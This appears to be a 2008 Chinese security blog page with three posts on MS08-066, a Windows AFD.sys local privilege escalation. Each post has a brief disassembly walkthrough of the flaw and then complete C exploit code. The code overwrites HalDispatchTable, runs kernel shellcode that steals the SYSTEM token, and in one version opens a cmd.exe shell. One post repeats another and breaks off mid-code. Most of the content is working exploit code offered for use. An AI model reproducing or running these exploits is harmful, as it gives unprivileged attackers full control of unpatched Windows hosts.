矩阵毒刺 | Chinadu`s Blog

存档

‘矩阵毒刺’ 分类的存档

MS08-066 AFD.sys Local Privilege Escalation Exploit (POC)

2008年10月19日 Chinadu 没有评论

作者：Eros412
MS Bulletin : http://www.microsoft.com/technet/security/Bulletin/MS08-066.mspx

**********计算IoControlCode过程**********

.text:00010B9F                 mov     eax, [edx+0Ch] ; edx=CurrentStackLocation
.text:00010BA2                 push    esi
.text:00010BA3                 mov     esi, ecx
.text:00010BA5                 mov     ecx, eax  ;ecx=IoControlCode
.text:00010BA7                 shr     ecx, 2
.text:00010BAA                 and     ecx, 3FFh
.text:00010BB0                 push    edi
.text:00010BB1                 mov     edi, _AfdImmediateCallDispatch[ecx*4] ; ecx=0x0F

.data:00011FF8 _AfdImmediateCallDispatch dd 0 ; DATA XREF: AfdDispatchImmediateIrp(x,x)+12r
.data:00011FF8 ; AfdFastIoDeviceControl(x,x,x,x,x,x,x,x,x)+7Ar

.data:00012034 off_12034 dd offset AfdGetRemoteAddress(x,x,x,x,x,x,x,x)
.data:00012034 ; DATA XREF: .data:0001213Co

//0x12034-0x11FF8= 0x3C,所以ecx=(0x3C/4)=0x0F

PAGEAFD:0001AE64                 cmp     _AfdIoctlTable[esi], edi ;
PAGEAFD:0001AE6A                 jnz     loc_20510
PAGEAFD:0001AE6A
PAGEAFD:0001AE70                 mov     [edx+1], al
PAGEAFD:0001AE73                 mov     esi, _AfdIrpCallDispatch[esi]

//我们从_AfdIoctlTable寻找一个运算后==0x0F的值

kd>dd _AfdIoctlTable
f81c3108  00012003 00012007 0001200b 0001200c
f81c3118  00012010 00012017 0001201b 0001201f
f81c3128  00012023 00012024 0001202b 0001202f
f81c3138  00012033 00012037 0001203b 0001203f
f81c3148  00012043 00012047 0001204b 0001204f

//答案是0001203f

***********************************************

*****************溢出过程**********************

PAGE:000171B5                 cmp     [ebp+OutputBufferLength], eax
PAGE:000171B8                 jnb     short loc_171C3
PAGE:000171B8
PAGE:000171BA                 mov     [ebp+var_24], 80000005h
PAGE:000171C1                 jmp     short loc_171C9---------------------------------------------〉big problem!!!
PAGE:000171C1
PAGE:000171C3 ; ---------------------------------------------------------------------------
PAGE:000171C3
PAGE:000171C3 loc_171C3:                              ; CODE XREF: AfdGetRemoteAddress(x,x,x,x,x,x,x,x)+50j
PAGE:000171C3                 mov     [ebp+OutputBufferLength], eax
PAGE:000171C6                 mov     [ebp+var_24], esi
PAGE:000171C6
PAGE:000171C9
PAGE:000171C9 loc_171C9:                              ; CODE XREF: AfdGetRemoteAddress(x,x,x,x,x,x,x,x)+59j
PAGE:000171C9                 mov     [ebp+ms_exc.disabled], esi

PAGE:000171E0                 movzx   ecx, word ptr [ebx+5Ah] ;
PAGE:000171E4                 movzx   esi, word ptr [ebx+58h] ;
PAGE:000171E8                 add     esi, [ebp+ebx_70h] ;
PAGE:000171EB                 mov     edi, [ebp+OutputBuffer]-----------------------〉控制的OutputBuffer地址
PAGE:000171EE                 mov     eax, ecx
PAGE:000171F0                 shr     ecx, 2
PAGE:000171F3                 rep movsd--------------------------〉其实就是把sockaddr_in的内容拷贝，其中OutputBuffer地址里的内容被修改成
                                                                   sockaddr_in.in_addr.s_addr，而这里的sockaddr_in就是accept()的socket里的
                                                                   [HalDispatchTable]==sin_port
                          &nbs
p;                                        [HalDispatchTable=0x02]==AF_INET
                                                                   [HalDispatchTable+0x04]==sockaddr_in.in_addr.s_addr

kd>dd HalDispatchTable
80538ab8 88880002 0100007f cccccccc cccccccc

PAGE:000171F5                 mov     ecx, eax        ;
PAGE:000171F7                 and     ecx, 3          ;
PAGE:000171FA                 rep movsb

typedef struct _THREAD_PARAMS
{
HANDLE hInitEvent;
HANDLE hReadyEvent;
} THREAD_PARAMS, *PTHREAD_PARAMS;

typedef DWORD (WINAPI *PNTALLOCATE)(        IN HANDLE ProcessHandle,
                                        IN OUT PVOID            *BaseAddress,
                                        IN ULONG                ZeroBits,
                                        IN OUT PULONG           RegionSize,
                                        IN ULONG                AllocationType,
                                        IN ULONG                Protect );

typedef DWORD (WINAPI *PNTQUERYINTERVAL)( ULONG ProfileSource,PULONG Interval );

#pragma comment (lib, "ws2_32.lib")

VOID WINAPI FooServer(LPVOID pParam)
{
    PTHREAD_PARAMS lParams = (PTHREAD_PARAMS)pParam;
    SOCKET tcp_socket;
        SOCKET local_client;
        sockaddr_in localonly;
        sockaddr_in remote;
    int remoteLen = sizeof(remote);
    localonly.sin_family=AF_INET;
    localonly.sin_addr.s_addr = inet_addr("127.0.0.1");
    localonly.sin_port=htons(0x8888);
    tcp_socket= socket( AF_INET,SOCK_STREAM, 0 );
    bind(tcp_socket,(sockaddr*)&localonly,sizeof(localonly));
        SetEvent(lParams->hInitEvent);
        listen(tcp_socket,2);
        local_client = accept(tcp_socket,(struct sockaddr*)&remote,&remoteLen);
        printf("\n\t-> Incoming connection: %s\n\n",inet_ntoa(remote.sin_addr));
        WaitForSingleObject( lParams->hReadyEvent, -1 );
        closesocket(local_client);
        closesocket(tcp_socket);
        return;
}

int main () {

   printf("=====================================================================   \n");
   printf("\t\tMS08-066  AFD.sys Local Privilege Escalation Exploit  (POC)   \n");
   printf("\t\t    Coded and Modified by :Eros412               \n");
   printf("\t\t   Special Thanks to : Ruben Santamarta       \n");
   printf("=====================================================================   \n");

        ULONG result;
        int status;
        PROCESS_INFORMATION
       pi;
        STARTUPINFOA                                stStartup;
        DWORD HookAddress = 0x80538ab8; //HalDispatchTable address,修改KeQueryIntervalProfile的call function 的地址
                             //8062cdc2 ff15bc8a5380    call    dword ptr [nt!HalDispatchTable+0x4 (80538abc)]
        PVOID        ShellCodeMemory = (PVOID)0x01000000 ;
        DWORD        MemorySize = 0x1000;
        PNTALLOCATE        NtAllocateVirtualMemory;
        PNTQUERYINTERVAL        NtQueryIntervalProfile;
        THREAD_PARAMS lParams = {0};
        char inBuff[0x40];
        char outBuff[0x40];
        DWORD junk ;
        SOCKET tcp_socket;
        struct sockaddr_in peer;
        WSADATA ws;
        WSAStartup(0x0202,&ws);
        NtAllocateVirtualMemory = (PNTALLOCATE) GetProcAddress(GetModuleHandle(        "ntdll.dll"),
                                                                                                                                                        "NtAllocateVirtualMemory");

        NtQueryIntervalProfile = ( PNTQUERYINTERVAL ) GetProcAddress(GetModuleHandle("ntdll.dll"),
                                                                                                                                                                        "NtQueryIntervalProfile");

        status = NtAllocateVirtualMemory( (HANDLE)-1,
                                                                          &ShellCodeMemory,
                                                                          0,
                                                                          &MemorySize,
                                                                          MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN,
                                                                          PAGE_EXECUTE_READWRITE );

        memset( ShellCodeMemory, 0x90, MemorySize );
        memcpy((void*)((BYTE*)ShellCodeMemory + 0x100),ShellCode,80);
        //"127.0.0.1" 在内存里==0x0100007F,所以shellcode放在后面（0x01000100）就没问题了
        lParams.hInitEvent = CreateEvent(0, FALSE, FALSE, 0);
        lParams.hReadyEvent = CreateEvent(0, FALSE, FALSE, 0);
        memset(inBuff,0x90,sizeof(inBuff));
        memset(outBuff,0x90,sizeof(outBuff));
        CreateThread(         NULL,
                                        0,  &
nbsp;
                                        (LPTHREAD_START_ROUTINE)FooServer,
                                        (LPVOID)&lParams,
                                        0,
                                        NULL);

        peer.sin_family = AF_INET;
        peer.sin_port = htons( 0x8888 );
        peer.sin_addr.s_addr = inet_addr( "127.0.0.1" );
        tcp_socket = socket(AF_INET, SOCK_STREAM, 0);
        WaitForSingleObject(lParams.hInitEvent, -1);
        connect(tcp_socket, (struct sockaddr*) &peer, sizeof(sockaddr_in));
        DeviceIoControl((HANDLE)tcp_socket,
                                        0x1203f,
                                        (LPVOID)inBuff,sizeof(inBuff),
                                        (LPVOID)HookAddress,0,
                                        &junk,
                                        NULL);
    NtQueryIntervalProfile(3,&result);
        SetEvent(lParams.hReadyEvent);
        GetStartupInfo( &stStartup );
        CreateProcess( NULL,
                                        "cmd.exe",
                                        NULL,
                                        NULL,
                                        TRUE,
                                        NULL,
                                        NULL,
                                        NULL,
                                        &stStartup,
                                        &pi );

return 0;
}

http://www.milw0rm.com/exploits/6757 - MS Windows XP/2003 AFD.sys Privilege Escalation Exploit (K-plugin) by Ruben Santamarta
http://www.whitecell.org/list.php?id=60 - Windows XP 核心驱动 AFD.sys 本地权限提升漏洞分析(ms08066) by Polymorphours
http://blogs.technet.com/swi/arc ... user-mode-data.aspx

分类: 矩阵毒刺标签: Exploit

ms08-066

2008年10月16日 Chinadu 没有评论

作者：SoBeIt

#include
#include
#include

#pragma comment(lib, "ws2_32.lib")

#define NTSTATUS int

typedef struct _PROCESS_BASIC_INFORMATION {
NTSTATUS ExitStatus;
PVOID PebBaseAddress;
ULONG AffinityMask;
ULONG BasePriority;
ULONG UniqueProcessId;
ULONG InheritedFromUniqueProcessId;
} PROCESS_BASIC_INFORMATION, *PPROCESS_BASIC_INFORMATION;

typedef struct _IMAGE_FIXUP_ENTRY {
USHORT Offset:12;
USHORT Type:4;
} IMAGE_FIXUP_ENTRY, *PIMAGE_FIXUP_ENTRY;

typedef enum _PROCESS_IMFORMATION_CLASS {
ProcessBasicInformation,
ProcessQuotaLimits,
ProcessIoCounters,
ProcessVmCounters,
ProcessTimes,
ProcessBasePriority,
ProcessRaisePriority,
ProcessDebugPort,
ProcessExceptionPort,
ProcessAccessToken,
ProcessLdtInformation,
ProcessLdtSize,
ProcessDeaultHardErrorMode,
ProcessIoPortHandlers,
ProcessPooledUsageAndLimits,
ProcessWorkingSetWatch,
ProcessUserModeIOPL,
ProcessEnableAlignmentFaultFixup,
ProcessPriorityClass,
ProcessWx86Information,
ProcessHandleCount,
ProcessAffinityMask,
ProcessPriorityBoost,
ProcessDeviceMap,
ProcessSessionInformation,
ProcessForegroundInformation,
ProcessWow64Information
} PROCESS_INFORMATION_CLASS;

typedef enum _SYSTEM_INFORMATION_CLASS {
SystemBasicInformation,
SystemProcessorInformation,
SystemPerformanceInformation,
SystemTimeOfDayInformation,
SystemNotImplemented1,
SystemProcessesAndThreadsInformation,
SystemCallCounts,
SystemConfigurationInformation,
SystemProcessorTimes,
SystemGlobalFlag,
SystemNotImplemented2,
SystemModuleInformation,
SystemLockInformation,
SystemNotImplemented3,
SystemNotImplemented4,
SystemNotImplemented5,
SystemHandleInformation,
SystemObjectInformation,
SystemPagefileInformation,
SystemInstructioEmulationCounts,
SystemInvalidInfoClass1,
SystemCacheInformation,
SystemPoolTagInformation,
SystemProcessorStatistics,
SystemDpcInformation,
SystemNotImplemented6,
SystemLoadImage,
SystemUnloadImage,
SystemTimeAdjustment,
SystemNotImplemented7,
SystemNotImplemented8,
SystemNotImplemented9,
SystemCrashDumpInformation,
SystemExceptionInformation,
SystemCrashDumpStateInformation,
SystemKernelDebuggerInformation,
SystemContextSwitchInformation,
SystemRegisterQuotaInformation,
SystemLoadAndCallImage,
SystemPrioritySeparation
} SYSTEM_INFORMATION_CLASS;

typedef enum _KPROFILE_SOURCE {
ProfileTime,
ProfileAlignmentFixup,
ProfileTotalIssues,
ProfilePipelineDry,
ProfileLoadInstructions,
ProfilePipelineFrozen,
ProfileBranchInstructions,
ProfileTotalNonissues,
ProfileDcacheMisses,
ProfileIcacheMisses,
ProfileCacheMisses,
ProfileBranchMispredictions,
ProfileStoreInstructions,
ProfileFpInstructions,
ProfileIntegerInstructions,
Profile2Issue,
Profile3Issue,
Profile4Issue,
ProfileSpecialInstructions,
ProfileTotalCycles,
ProfileIcacheIssues,
ProfileDcacheAccesses,
ProfileMemoryBarrierCycles,
ProfileLoadLinkedIssues,
ProfileMaximum
} KPROFILE_SOURCE, *PKPROFILE_SOURCE;

typedef struct _UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;

typedef struct _SECTION_BASIC_INFORMATION {
PVOID BaseAddress;
ULONG Attributes;
LARGE_INTEGER Size;
}SECTION_BASIC_INFORMATION, *PSECTION_BASIC_INFORMATION;

typedef struct _SYSTEM_MODULE_INFORMATION {
ULONG Reserved[2];
PVOID Base;
ULONG Size;
ULONG Flags;
USHORT Index;
USHORT Unknown;
USHORT LoadCount;
USHORT ModuleNameOffset;
CHAR ImageName[256];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;

typedef NTSTATUS (NTAPI *ZWQUERYINTERNALPROFILE)(ULONG, PULONG);
typedef NTSTATUS (NTAPI *ZWQUERYINFORMATIONPROCESS)(HANDLE, ULONG, PVOID, ULONG, PULONG);
typedef NTSTATUS (NTAPI *ZWQUERYSYSTEMINFORMATION)(ULONG, PVOID, ULONG, PULONG);
typedef NTSTATUS (NTAPI *ZWALLOCATEVIRTUALMEMORY)(HANDLE, PVOID *, ULONG, PULONG, ULONG, ULONG);
typedef PIMAGE_NT_HEADERS (NTAPI *RTLIMAGENTHEADER)(PVOID);
typedef PVOID (NTAPI *RTLIMAGEDIRECTORYENTRYTODATA)(PVOID, ULONG, USHORT, PULONG);

ZWQUERYINTERNALPROFILE ZwQueryIntervalProfile;
ZWQUERYINFORMATIONPROCESS ZwQueryInformationProcess;
ZWQUERYSYSTEMINFORMATION ZwQuerySystemInformation;
ZWALLOCATEVIRTUALMEMORY ZwAllocateVirtualMemory;
RTLIMAGENTHEADER RtlImageNtHeader;
RTLIMAGEDIRECTORYENTRYTODATA RtlImageDirectoryEntryToData;

unsigned char kfunctions[64][64] =
{
//ntoskrnl.exe
{"ZwTerminateProcess"},
{"PsLookupProcessByProcessId"},
{""},
};

unsigned char shellcode[] =
"\x90\x60\x9c\xe9\xc4\x00\x00\x00\x5f\x4f\x47\x66\x81\x3f\x90\xcc"
"\x75\xf8\x66\x81\x7f\x02\xcc\x90\x75\xf0\x83\xc7\x04\x64\x8b\x35"
"\x38\x00\x00\x00\xad\xad\x48\x81\x38\x4d\x5a\x90\x00\x75\xf7\x95"
"\x8b\xf7\x6a\x02\x59\xe8\x4d\x00\x00\x00\xe2\xf9\x8b\x4e\x0c\xe8"
"\x29\x00\x00\x00\x50\x8b\x4e\x08\xe8\x20\x00\x00\x00\x5a\x8b\x7e"
"\x1c\x8b\x0c\x3a\x89\x0c\x38\x56\x8b\x7e\x14\x8b\x4e\x18\x8b\x76"
"\x10\xf3\xa4\x5e\x33\xc0\x50\x50\xff\x16\x9d\x61\xc3\x83\xec\x04"
"\x8d\x2c\x24\x55\x51\xff\x56\x04\x85\xc0\x0f\x85\x80\x8f\x00\x00"
"\x8b\x45\x00\x83\xc4\x04\xc3\x51\x56\x8b\x75\x3c\x8b\x74\x2e\x78"
"\x03\xf5\x56\x8b\x76\x20\x03\xf5\x33\xc9\x49\x41\xad\x03\xc5\x33"
"\xdb\x0f\xbe\x10\x85\xd2\x74\x08\xc1\xcb\x07\x03\xda\x40\xeb\xf1"
"\x3b\x1f\x75\xe7\x5e\x8b\x5e\x24\x03\xdd\x66\x8b\x0c\x4b\x8b\x5e"
"\x1c\x03\xdd\x8b\x04\x8b\x03\xc5\xab\x5e\x59\xc3\xe8\x37\xff\xff"
"\xff\x90\x90\x90"

"\x90\xcc\xcc\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xcc\x90\x90\xcc";

void ErrorQuit(pMsg)
{
printf("%sError Code:%d\n", pMsg, GetLastError());
ExitProcess(0);
}

ULONG ComputeHash(char *ch)
{
ULONG ret = 0;

while(*ch)
{
ret = ((ret << 25) | (ret >> 7)) + *ch++;
}

return ret;
}

void GetFunction()
{
HANDLE hNtdll;

hNtdll = LoadLibrary("ntdll.dll");
if(hNtdll == NULL)
ErrorQuit("LoadLibrary failed.\n");

ZwQueryIntervalProfile = (ZWQUERYINTERNALPROFILE)GetProcAddress(hNtdll, "ZwQueryIntervalProfile");
if(ZwQueryIntervalProfile == NULL)
ErrorQuit("GetProcAddress failed.\n");

ZwQueryInformationProcess = (ZWQUERYINFORMATIONPROCESS)GetProcAddress(hNtdll, "ZwQueryInformationProcess");
if(ZwQueryInformationProcess == NULL)
ErrorQuit("GetProcAddress failed.\n");

ZwQuerySystemInformation = (ZWQUERYSYSTEMINFORMATION)GetProcAddress(hNtdll, "ZwQuerySystemInformation");
if(ZwQuerySystemInformation == NULL)
ErrorQuit("GetProcessAddress failed.\n");

ZwAllocateVirtualMemory = (ZWALLOCATEVIRTUALMEMORY)GetProcAddress(hNtdll, "ZwAllocateVirtualMemory");
if(ZwAllocateVirtualMemory == NULL)
ErrorQuit("GetProcAddress failed.\n");

RtlImageNtHeader = (RTLIMAGENTHEADER)GetProcAddress(hNtdll, "RtlImageNtHeader");
if(RtlImageNtHeader == NULL)
ErrorQuit("GetProcAddress failed.\n");

RtlImageDirectoryEntryToData = (RTLIMAGEDIRECTORYENTRYTODATA)GetProcAddress(hNtdll, "RtlImageDirectoryEntryToData");
if(RtlImageDirectoryEntryToData == NULL)
ErrorQuit("GetProcAddress failed.\n");

FreeLibrary(hNtdll);
}

ULONG GetKernelBase(char *KernelName)
{
ULONG i, Byte, ModuleCount, KernelBase;
PVOID pBuffer;
PSYSTEM_MODULE_INFORMATION pSystemModuleInformation;
PCHAR pName;

ZwQuerySystemInformation(SystemModuleInformation, (PVOID)&Byte, 0, &Byte)
;

if((pBuffer = malloc(Byte)) == NULL)
ErrorQuit("malloc failed.\n");

if(ZwQuerySystemInformation(SystemModuleInformation, pBuffer, Byte, &Byte))
ErrorQuit("ZwQuerySystemInformation failed\n");

ModuleCount = *(PULONG)pBuffer;
pSystemModuleInformation = (PSYSTEM_MODULE_INFORMATION)((PUCHAR)pBuffer + sizeof(ULONG));
for(i = 0; i < ModuleCount; i++)
{
if((pName = strstr(pSystemModuleInformation->ImageName, "ntoskrnl.exe")) != NULL)
{
KernelBase = (ULONG)pSystemModuleInformation->Base;
printf("Kernel is %s\n", pSystemModuleInformation->ImageName);
free(pBuffer);
strcpy(KernelName, "ntoskrnl.exe");

return KernelBase;
}

if((pName = strstr(pSystemModuleInformation->ImageName, "ntkrnlpa.exe")) != NULL)
{
KernelBase = (ULONG)pSystemModuleInformation->Base;
printf("Kernel is %s\n", pSystemModuleInformation->ImageName);
free(pBuffer);
strcpy(KernelName, "ntkrnlpa.exe");

return KernelBase;
}

pSystemModuleInformation++;
}

free(pBuffer);
return 0;
}

ULONG GetServiceTable(PVOID pImageBase, ULONG Address)
{
PIMAGE_NT_HEADERS pNtHeaders;
PIMAGE_BASE_RELOCATION pBaseRelocation;
PIMAGE_FIXUP_ENTRY pFixupEntry;
ULONG RelocationTableSize = 0;
ULONG Offset, i, VirtualAddress, Rva;

Offset = Address - (ULONG)pImageBase;
pNtHeaders = (PIMAGE_NT_HEADERS)RtlImageNtHeader(pImageBase);
pBaseRelocation = (PIMAGE_BASE_RELOCATION)RtlImageDirectoryEntryToData(pImageBase, TRUE, IMAGE_DIRECTORY_ENTRY_BASERELOC, &RelocationTableSize);
if(pBaseRelocation == NULL)
return 0;

do
{
pFixupEntry = (PIMAGE_FIXUP_ENTRY)((ULONG)pBaseRelocation + sizeof(IMAGE_BASE_RELOCATION));

RelocationTableSize = (pBaseRelocation->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) >> 1;
for(i = 0; i < RelocationTableSize; i++, pFixupEntry++)
{
if(pFixupEntry->Type == IMAGE_REL_BASED_HIGHLOW)
{
VirtualAddress = pBaseRelocation->VirtualAddress + pFixupEntry->Offset;
Rva = *(PULONG)((ULONG)pImageBase + VirtualAddress) - (ULONG)pNtHeaders->OptionalHeader.ImageBase;

if(Rva == Offset)
{
if (*(PUSHORT)((ULONG)pImageBase + VirtualAddress - 2) == 0x05c7)
return *(PULONG)((ULONG)pImageBase + VirtualAddress + 4) - pNtHeaders->OptionalHeader.ImageBase;
}
}
}

*(PULONG)&pBaseRelocation += pBaseRelocation->SizeOfBlock;

} while(pBaseRelocation->VirtualAddress);

return 0;
}

int main(int argc, char* argv[])
{
PVOID pDrivers[256];
PVOID pOldKernelInfo, pMapAddress = NULL;
PULONG pStoreBuffer, pShellcode, pFakeKernelInfo;
PUCHAR pRestoreBuffer, pBase, FunctionAddress;
PROCESS_BASIC_INFORMATION pbi;
SYSTEM_MODULE_INFORMATION smi;
SECTION_BASIC_INFORMATION sbi;
KPROFILE_SOURCE ProfileSource;
OSVERSIONINFO ovi;
char DriverName[256], KernelName[64];
ULONG Byte, len, i, j, k, BaseAddress, Value, KernelBase, buf[64];
ULONG HookAddress, SystemId, TokenOffset, Sections, Pid, FunctionNumber;
ULONG HDTOffset, AllocationSize;
ULONG Result;
HANDLE hKernel;
WSADATA wsad;
int sockfd;
struct sockaddr_in saddr;

printf("\n MS08-0xx Windows Kernel Ancillary Function Driver Local Privilege Escalation Vulnerability Exploit \n\n");
printf("\t Create by SoBeIt. \n\n");
if(argc != 1)
{
printf(" Usage:%s\n\n", argv[0]);
return 1;
}

pFakeKernelInfo = (PULONG)malloc(256);

GetFunction();

if(ZwQueryInformationProcess(GetCurrentProcess(), ProcessBasicInformation, (PVOID)&pbi, sizeof(PROCESS_BASIC_INFORMATION), NULL))
ErrorQuit("ZwQueryInformationProcess failed\n");

KernelBase = GetKernelBase(KernelName);
if(!KernelBase)
ErrorQuit("Unable to get kernel base address.\n");

printf("Kernel base address: %x\n", KernelBase);

ovi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);

if(!GetVersionEx(&ovi))
ErrorQuit("GetVersionEx failed.\n");

if(ovi.dwMajorVersion != 5 && ovi.dwMajorVersion != 6)
ErrorQuit("Not Windows NT family OS.\n");

printf("Major Version:%d Minor Version:%d\n", ovi.dwMajorVersion, ovi.dwMinorVersion);
switch(ovi.dwMinorVersion)
{
case 0: //Windows2000
SystemId = 8;
TokenOffset = 0x12c;
break;

case 1: //WindowsXP
SystemId = 4;
TokenOffset = 0xc8;
break;

case 2: //Windows2003
SystemId = 4;
TokenOffset = 0xd8;
break;

default:
SystemId = 4;
TokenOffset = 0xc8;
}

hKernel = LoadLibrary(KernelName);
if(hKernel == NULL)
ErrorQuit("LoadLibrary failed.\n");

printf("Load Base:%x\n", (ULONG)hKernel);
HDTOffset = (ULONG)GetProcAddress(hKernel, "HalDispatchTable");
HDTOffset += KernelBase - (ULONG)hKernel;
printf("HalDispatchTable Offset:%x\n", HDTOffset);
HookAddress = (ULONG)(HDTOffset + 4);
printf("NtQueryIntervalProfile function entry address:%x\n", HookAddress);

AllocationSize = 0x1000;
pStoreBuffer = (PULONG)0x7fb0;
if(ZwAllocateVirtualMemory((HANDLE)0xffffffff, &pStoreBuffer, 0, &AllocationSize,
MEM_RESERVE | MEM_COMMIT | MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE))
ErrorQuit("ZwAllocateVirtualMemory failed.\n");

pRestoreBuffer = malloc(0x100);

memset(pStoreBuffer, 0x90, AllocationSize);

pShellcode = (PULONG)shellcode;
for(k = 0; pShellcode[k++] != 0x90cccc90; )
;

for(j = 0; kfunctions[j][0] != '\x0'; j++)
buf[j] = ComputeHash(kfunctions[j]);

buf[j++] = pbi.InheritedFromUniqueProcessId;
buf[j++] = SystemId;
buf[j++] = (ULONG)pRestoreBuffer;
buf[j++] = HookAddress;
buf[j++] = 0x04;
buf[j++] = TokenOffset;

memcpy((char *)(pShellcode + k), (char *)buf, j * 4);
memcpy((PUCHAR)0x8000, shellcode, sizeof(shellcode) - 1);

if(WSAStartup(MAKEWORD(2, 2), &wsad) != 0)
ErrorQuit("WSAStartup failed.\n");

if((sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
ErrorQuit("socket failed.\n");

saddr.sin_family = AF_INET;
saddr.sin_port = htons(0x1bd);
saddr.sin_addr.s_addr = 0x100007f;

if(connect(sockfd, (struct sockaddr *)&saddr, sizeof(struct sockaddr)))
ErrorQuit("connect failed.\n");

DeviceIoControl((HANDLE)sockfd, 0x1203F, NULL, 0, (PVOID)(HookAddress - 3), 0, &Result, NULL);

ProfileSource = ProfileTotalIssues;
ZwQueryIntervalProfile(ProfileSource, &Result);

printf("Exploit finished.\n");
return 1;
}

分类: 矩阵毒刺标签: Exploit

MS08-066 AFD.sys Local Privilege Escalation Exploit (POC)

2008年10月16日 Chinadu 没有评论

文章作者：Eros412
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

MS Bulletin : http://www.microsoft.com/technet/security/Bulletin/MS08-066.mspx

**********计算IoControlCode过程**********

.text:00010B9F mov eax, [edx+0Ch] ; edx=CurrentStackLocation
.text:00010BA2 push esi
.text:00010BA3 mov esi, ecx
.text:00010BA5 mov ecx, eax ;ecx=IoControlCode
.text:00010BA7 shr ecx, 2
.text:00010BAA and ecx, 3FFh
.text:00010BB0 push edi
.text:00010BB1 mov edi, _AfdImmediateCallDispatch[ecx*4] ; ecx=0x0F

.data:00011FF8 _AfdImmediateCallDispatch dd 0 ; DATA XREF: AfdDispatchImmediateIrp(x,x)+12r
.data:00011FF8 ; AfdFastIoDeviceControl(x,x,x,x,x,x,x,x,x)+7Ar

.data:00012034 off_12034 dd offset AfdGetRemoteAddress(x,x,x,x,x,x,x,x)
.data:00012034 ; DATA XREF: .data:0001213Co

//0x12034-0x11FF8= 0x3C,所以ecx=(0x3C/4)=0x0F

PAGEAFD:0001AE64 cmp _AfdIoctlTable[esi], edi ;
PAGEAFD:0001AE6A jnz loc_20510
PAGEAFD:0001AE6A
PAGEAFD:0001AE70 mov [edx+1], al
PAGEAFD:0001AE73 mov esi, _AfdIrpCallDispatch[esi]

//我们从_AfdIoctlTable寻找一个运算后==0x0F的值

kd>dd _AfdIoctlTable
f81c3108 00012003 00012007 0001200b 0001200c
f81c3118 00012010 00012017 0001201b 0001201f
f81c3128 00012023 00012024 0001202b 0001202f
f81c3138 00012033 00012037 0001203b 0001203f
f81c3148 00012043 00012047 0001204b 0001204f

//答案是0001203f

***********************************************

*****************溢出过程**********************

PAGE:000171B5 cmp [ebp+OutputBufferLength], eax
PAGE:000171B8 jnb short loc_171C3
PAGE:000171B8
PAGE:000171BA mov [ebp+var_24], 80000005h
PAGE:000171C1 jmp short loc_171C9---------------------------------------------〉big problem!!!
PAGE:000171C1
PAGE:000171C3 ; ---------------------------------------------------------------------------
PAGE:000171C3
PAGE:000171C3 loc_171C3: ; CODE XREF: AfdGetRemoteAddress(x,x,x,x,x,x,x,x)+50j
PAGE:000171C3 mov [ebp+OutputBufferLength], eax
PAGE:000171C6 mov [ebp+var_24], esi
PAGE:000171C6
PAGE:000171C9
PAGE:000171C9 loc_171C9: ; CODE XREF: AfdGetRemoteAddress(x,x,x,x,x,x,x,x)+59j
PAGE:000171C9 mov [ebp+ms_exc.disabled], esi

PAGE:000171E0 movzx ecx, word ptr [ebx+5Ah] ;
PAGE:000171E4 movzx esi, word ptr [ebx+58h] ;
PAGE:000171E8 add esi, [ebp+ebx_70h] ;
PAGE:000171EB mov edi, [ebp+OutputBuffer]-----------------------〉控制的OutputBuffer地址
PAGE:000171EE mov eax, ecx
PAGE:000171F0 shr ecx, 2
PAGE:000171F3 rep movsd--------------------------〉其实就是把sockaddr_in的内容拷贝，其中OutputBuffer地址里的内容被修改成
sockaddr_in.in_addr.s_addr，而这里的sockaddr_in就是accept()的socket里的
[HalDispatchTable]==sin_port
[HalDispatchTable=0x02]==AF_INET
[HalDispatchTable+0x04]==sockaddr_in.in_addr.s_addr

kd>dd HalDispatchTable
80538ab8 88880002 0100007f cccccccc cccccccc

PAGE:000171F5 mov ecx, eax ;
PAGE:000171F7 and ecx, 3 ;
PAGE:000171FA rep movsb

***********************************************

代码:

#include <Winsock2.h> #include <stdio.h> #include <windows.h> char ShellCode[]="\x90\x90\x90\x90\x90\x90\xB8\x24\xF1\xDF" "\xFF\x8B\x00\x8B\xB0\x20\x02\x00\x00\x8B" "\xC6\x8B\x80\x88\x00\x00\x00\x2D\x88\x00" "\x00\x00\x8B\x90\x84\x00\x00\x00\x83\xFA" "\x04\x75\xEA\x8B\x80\xC8\x00\x00\x00\x89" "\x86\xC8\x00\x00\x00\xC2\x08\x00"; typedef struct _THREAD_PARAMS { HANDLE hInitEvent; HANDLE hReadyEvent; } THREAD_PARAMS, *PTHREAD_PARAMS; typedef DWORD (WINAPI *PNTALLOCATE)( IN HANDLE ProcessHandle, IN OUT PVOID *BaseAddress, IN ULONG ZeroBits, IN OUT PULONG RegionSize, IN ULONG AllocationType, IN ULONG Protect ); typedef DWORD (WINAPI *PNTQUERYINTERVAL)( ULONG ProfileSource,PULONG Interval ); #pragma comment (lib, "ws2_32.lib") VOID WINAPI FooServer(LPVOID pParam) { PTHREAD_PARAMS lParams = (PTHREAD_PARAMS)pParam; SOCKET tcp_socket; SOCKET local_client; sockaddr_in localonly; sockaddr_in remote; int remoteLen = sizeof(remote); localonly.sin_family=AF_INET; localonly.sin_addr.s_addr = inet_addr("127.0.0.1"); localonly.sin_port=htons(0x8888); tcp_socket= socket( AF_INET,SOCK_STREAM, 0 ); bind(tcp_socket,(sockaddr*)&localonly,sizeof(localonly)); SetEvent(lParams->hInitEvent); listen(tcp_socket,2); local_client = accept(tcp_socket,(struct sockaddr*)&remote,&remoteLen); printf("\n\t-> Incoming connection: %s\n\n",inet_ntoa(remote.sin_addr)); WaitForSingleObject( lParams->hReadyEvent, -1 ); closesocket(local_client); closesocket(tcp_socket); return; } int main () { printf("===================================================================== \n"); printf("\t\tMS08-066 AFD.sys Local Privilege Escalation Exploit (POC) \n"); printf("\t\t Coded and Modified by :Eros412 \n"); printf("\t\t Special Thanks to : Ruben Santamarta \n"); printf("===================================================================== \n"); ULONG result; int status; PROCESS_INFORMATION pi; 